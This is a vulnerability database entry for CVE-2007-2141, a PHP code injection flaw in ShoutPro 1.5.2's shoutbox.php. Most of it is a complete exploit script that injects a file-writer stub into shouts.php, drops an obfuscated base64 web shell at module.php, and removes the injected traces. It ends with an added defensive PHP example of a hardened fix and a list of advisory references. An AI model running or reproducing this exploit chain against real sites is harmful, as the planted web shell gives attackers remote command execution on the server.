ShoutPro 'shoutbox.php' Direct Static Code Injection Vulnerability

Vulnerability ID: 1112729
Vulnerability type: Input validation
Published: 2007-04-17
Updated: 2007-04-19
CVE: CVE-2007-2141
CNNVD ID: CNNVD-200704-391
Platform: PHP
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/3758
https://cxsecurity.com/issue/WLB-2007040100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-391
|Vulnerability Details
ShoutPro's shoutbox.php contains a direct static code injection vulnerability. A remote attacker can inject arbitrary PHP code into the shouts.php script via the shout parameter.
|Exploit (EXP)
<?/*
File: shoutbox.php
Affects: ShoutPro 1.5.2 (may affect earlier versions)
Date: 17th April 2007

Issue Description:
===========================================================================
ShoutPro 1.5.2 fails to fully sanitize user input ($shout) that it writes
to the shouts.php file when adding a new message; this can result in the
injection and execution of arbitrary PHP code.
===========================================================================

Scope:
===========================================================================
The vulnerability will in most cases allow an attacker to execute commands
on the system; the issue may be further perpetuated if the user has followed
the official documentation and chmoded the base folder to '777'.
===========================================================================

Recommendation:
===========================================================================
1) Add code to perform strip_tags() on $shout in shoutbox.php
2) Prevent direct access to shouts.php with a .htaccess file
===========================================================================

Discovered By: Gammarays
*/?>


<?php

echo "########################################################\n";
echo "#   Special Greetings To - Timq,Warpboy,The-Maggot     #\n";
echo "########################################################\n\n\n";

//Writes Files - Under 100 bytes to meet requirements
$temppayload = "%3C%3F%24a%3Dfopen%28%24_POST%5B%27f%27%5D%2C%27w%27%29%3Bfwrite%28%24a%2Cbase64_decode%28%24_POST%5B%27d%27%5D%29%29%3Bfclose%28%24a%29%3B%3F%3E";

//Execute Commands + Performs Cleanup
$payload = "PD9waHAgCgppZihpc3NldCgkX0dFVFsnY21kJ10pKQp7CmVjaG8gc2hlbGxfZXhlYyh1cmxkZWNv".
          "ZGUoJF9HRVRbJ2NtZCddKSk7CmRpZSgpOwp9CgppZigkX1BPU1RbJ2NsZWFuJ109PSdkb2l0Jykg".
          "Y2xlYW4oKTsKCmZ1bmN0aW9uIGNsZWFuKCkKewogICRsMSA9IGZpbGUoJ3Nob3V0cy5waHAnKTsK".
          "ICAkZmggPSBmb3Blbignc2hvdXRzLnBocCcsJ3cnKTsKICBpZighJGZoKSBkaWUoKTsKCiAgZm9y".
          "ZWFjaCAoJGwxIGFzICRsMikgCiAgewoJaWYoIXN0cnN0cigkbDIsIiRhPWZvcGVuIikpCgl7CgkJ".
          "ZnByaW50ZigkZmgsJGwyKTsKCX0gICAgCiAgfQogIGZjbG9zZSgkZmgpOwp9Cgo/Pg==";



if($argc!=2) die("Usage: <url> \n\tEx: http://www.example.com/shoutpro/\n");

$url = $argv[1];
//$url = "http://localhost/ShoutPro1.5.2/";

$ch = curl_init($url . "shoutbox.php");
if(!$ch) die("Error Initializing CURL");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target - Is URL Valid?");

echo "[ ] Deploying Temp Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shoutbox.php?action=post");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"name=Beethoven&pass=&shout=".$temppayload."&post=Post");
$res = curl_exec($ch);
if(!$res) die("Error Deploying Temp Payload");

echo "[ ] Deploying Main Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shouts.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"f=module.php&d=".$payload);
$res = curl_exec($ch);
if(!$res) die("Error Deploying Main Payload");

echo "[ ] Attempting Clean Up...\n";

curl_setopt($ch, CURLOPT_URL,$url . "module.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"clean=doit");
$res = curl_exec($ch);
if(!$res) die("Error - Clean Up Failed");

echo "[ ] Clean Up Complete\n";
echo "[ ] Shell Accessible at ".$url."module.php?cmd=<yourcommand>";

curl_close($ch);
?>

# milw0rm.com [2007-04-17]
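The flaw the details section and the advisory's recommendations describe, as an added example that is not ShoutPro's code: save_shout_vulnerable is an assumed reconstruction of the unsanitized write into shouts.php, and save_shout_hardened/render_shouts show one fix that stores messages as JSON lines in a non-executable file and encodes them on output (the JSON flag assumes PHP 7.2 or later).

```php
<?php
// Added example, not ShoutPro's source. The vulnerable function is an assumed
// reconstruction of the pattern the advisory describes; the hardened form is
// one way a maintainer could fix it.

// ASSUMED vulnerable shape: the raw message is appended to shouts.php, which the
// shoutbox later include()s, so any "<?php ... ?>" in $shout becomes live code.
function save_shout_vulnerable(string $phpFile, string $name, string $shout): void
{
    file_put_contents($phpFile, "<b>$name</b>: $shout<br />\n", FILE_APPEND | LOCK_EX);
}

// Hardened: messages are data, never code. They go into a non-.php file kept
// outside the web root (which also removes the direct-access problem the .htaccess
// advice targets) and are encoded on output; strip_tags() is not an output encoder.
function save_shout_hardened(string $dataFile, string $name, string $shout): void
{
    if (strlen($name) > 40 || strlen($shout) > 500) {
        throw new InvalidArgumentException('name or message too long');
    }
    $record = json_encode(
        ['t' => time(), 'name' => $name, 'shout' => $shout],
        JSON_INVALID_UTF8_SUBSTITUTE   // PHP 7.2+: never emit "false" for bad UTF-8
    );
    file_put_contents($dataFile, $record . "\n", FILE_APPEND | LOCK_EX);
}

function render_shouts(string $dataFile): string
{
    $html = '';
    foreach (file($dataFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $r = json_decode($line, true);
        if (!is_array($r) || !isset($r['name'], $r['shout'])) {
            continue;   // skip corrupt records instead of trusting them
        }
        $html .= '<b>' . htmlspecialchars($r['name'], ENT_QUOTES, 'UTF-8') . '</b>: '
               . htmlspecialchars($r['shout'], ENT_QUOTES, 'UTF-8') . "<br />\n";
    }
    return $html;
}

// Constructed probe shaped like a code-injection attempt; it is rendered as inert text.
$dataFile = sys_get_temp_dir() . '/shouts.jsonl';
@unlink($dataFile);
save_shout_hardened($dataFile, 'guest', "hi <?php echo 'injected'; ?>");
echo render_shouts($dataFile);
```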
|References

BID 23542: http://www.securityfocus.com/bid/23542
BUGTRAQ 20070417ShoutPro1.5.2-arbitrarycodeexecution: http://www.securityfocus.com/archive/1/archive/1/466037/100/0/threaded
MILW0RM 3758: http://www.milw0rm.com/exploits/3758
VUPEN ADV-2007-1432: http://www.frsirt.com/english/advisories/2007/1432
OSVDB 34999: http://osvdb.org/34999
XF shoutpro-shouts-code-execution(33727): http://xforce.iss.net/xforce/xfdb/33727
SREASON 2593: http://securityreason.com/securityalert/2593
SECUNIA 24939: http://secunia.com/advisories/24939